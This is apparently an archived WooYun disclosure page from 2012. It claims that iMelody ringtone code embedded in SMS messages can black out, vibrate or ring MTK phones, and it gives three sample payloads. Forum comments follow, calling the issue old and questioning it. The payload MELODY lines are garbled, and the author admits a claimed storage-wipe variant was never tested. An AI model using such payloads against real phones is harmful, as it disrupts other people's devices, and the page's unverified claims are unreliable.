MTK手机短信漏洞大曝光0day

漏洞概要

缺陷编号:WooYun-2012-06502

漏洞标题:MTK手机短信漏洞大曝光0day

相关厂商:联发科技股份有限公司

漏洞作者:小俊

提交时间:2012-04-28 16:15

公开时间:2012-04-28 16:15

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

Tags标签:

漏洞详情

披露状态:

2012-04-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-04-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

这些情况都是由于MTK手机支持的一种imy格式铃声引起的,在短信内容中加载不同的imy文件会造成不同的效果。这种imy文件的内容具体如下:(注意,代码为两行#之间的部分,不包括#) 1.黑屏###########################
BEGIN:IMELODY
BEAT:1200
MELODY:([email protected])
END:IMELODY
###########################  2.猛震###########################
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:100
MELODY:([email protected])
END:IMELODY
###########################  3.振铃###########################
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:200
MELODY:([email protected])
END:IMELODY
###########################

详细说明:

这个漏洞的精髓就是imy文件。据了解,imy文件是索爱最早支持的一种代码形式的单音节铃声,可以用代码调用手机的解码芯片发出一些声音甚至一些核心指令。所以代码里面如果是诸如黑屏、响铃等类似的命令,发送给对方后,一旦打开也就触发了这些命令,当然会造成相应的结果。目前看来,只要有人能够懂得这些代码的编写语言,发送格式化储存卡一类的短信应该是没有问题的。我手里就有一个格式化命令的imy文件,由于担心给他人造成不良后果,一直没有实验。在我的实验过程中,我发现并非所有屏幕有灰色功能键的手机都能中招,也许这些手机使用的不是MTK方案吧。我推测,既然imy并非MTK手机专有格式,那么理论上所有支持imy铃声的手机都会中招。至于预防,我想这是很难的,毕竟只要触发就会中招,也许只能是看到类似的短信立即关闭,不继续翻阅从而避免激活imy文件代码,可能会有一些帮助。当然,这只是相对的,如果对方发送的短信是先插入的imy文件再写文字的话……

漏洞证明:

1.黑屏###########################BEGIN:IMELODYBEAT:1200MELODY:([email protected])END:IMELODY###########################  2.猛震###########################BEGIN:IMELODYVERSION:1.2FORMAT:CLASS1.0BEAT:100MELODY:([email protected])END:IMELODY###########################  3.振铃###########################BEGIN:IMELODYVERSION:1.2FORMAT:CLASS1.0BEAT:200MELODY:([email protected])END:IMELODY###########################

修复方案:

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:6 (WooYun评价)

评价

  1. 2010-01-01 00:00 lazypeople 白帽子 | Rank:22 漏洞数:6)

    @小俊 是人才

  2. 2010-01-01 00:00 zeracker 白帽子 | Rank:1028 漏洞数:134)

    几年前,就出来的文章了。
    一些网站,又当冷饭炒。
    所以...

  3. 2010-01-01 00:00 小俊 白帽子 | Rank:16 漏洞数:4)

    @zeracker 这东西一直都存在,只是一直未公布,那些新闻网站虽然公布了,但却公布在某个角落,谁会看得见呢?

  4. 2010-01-01 00:00 笨猪 白帽子 | Rank:54 漏洞数:12)

    几年前的东西了,又炒冷饭。。

  5. 2010-01-01 00:00 1cefish 白帽子 | Rank:47 漏洞数:12)

    好久之前的东西了 - - 伤不起

  6. 2010-01-01 00:00 牛奶坦克 白帽子 | Rank:253 漏洞数:20)

    我是认为啊,不管凉饭热饭,起码几年前没出什么结果与实例,现在又出来了,给这个浮躁的圈子找点研究方向也是正确的,天天xss,注入,也腻了不是?wooyun会让我们看见新的目标,也会让我们看到被遗忘的角落,不是么?

  7. 2010-01-01 00:00 qing 白帽子 | Rank:0 漏洞数:0)

    支持!只要还存在就应该得到重视。

  8. 2010-01-01 00:00 小俊 白帽子 | Rank:16 漏洞数:4)

    @牛奶坦克 说得很对!

  9. 2010-01-01 00:00 小俊 白帽子 | Rank:16 漏洞数:4)

    @qing 说得对!!

  10. 2010-01-01 00:00 一刀终情 白帽子 | Rank:154 漏洞数:27)

    请问imy代码怎么插入到短信里?明文,不至于吧?

  11. 2010-01-01 00:00 包包 白帽子 | Rank:0 漏洞数:1)

    人才

  12. 2010-01-01 00:00 Lee 白帽子 | Rank:113 漏洞数:24)

    亲,测试过么?

  13. 2010-01-01 00:00 包包 白帽子 | Rank:0 漏洞数:1)

    @Lee 我是自己测过了